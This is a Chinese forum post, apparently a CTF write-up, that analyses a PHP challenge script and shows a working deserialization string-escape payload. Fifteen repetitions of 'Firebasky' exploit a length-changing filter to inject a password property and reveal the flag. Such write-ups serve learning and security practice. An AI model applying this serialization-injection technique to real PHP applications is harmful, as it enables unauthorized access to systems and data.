CTF-18解题思路

Track-子羽   ·   发表于 2021-11-17 14:51:42   ·   CTF&WP专版

源码分析:

  1. <?php
  2. highlight_file(__FILE__);
  3. error_reporting(0);
  4. class a
  5. {
  6. public $uname;
  7. public $password;
  8. public function __construct($uname,$password)
  9. {
  10. $this->uname=$uname;
  11. $this->password=$password;
  12. }
  13. public function __wakeup()
  14. {
  15. if($this->password==='yu22x')
  16. {
  17. include('flag.php');
  18. echo $flag;
  19. }
  20. else
  21. {
  22. echo 'wrong password';
  23. }
  24. }
  25. }
  26. function filter($string){
  27. return str_replace('Firebasky','Firebaskyup',$string);
  28. }
  29. $uname=$_GET[1];
  30. $password=1;
  31. $ser=filter(serialize(new a($uname,$password)));
  32. $test=unserialize($ser);
  33. ?>

得到flag的条件:$this->password==='yu22x'

难点是$password不可控,考查的是反序列化字符串逃逸。(https://www.cnblogs.com/NPFS/p/13338789.html)

要在参数值的结尾构造:";s:8:"password";s:5:"yu22x";}(总共是30个字符)。因为str_replace('Firebasky','Firebaskyup',$string);替换后从9个字符变为了11个,多了两个字符,因此输入15个Firebasky即可。

payload:

  1. FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}

打赏我,让我更有动力~

0 Reply   |  Until 20天前 | 45 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2021 掌控者 All Rights Reserved.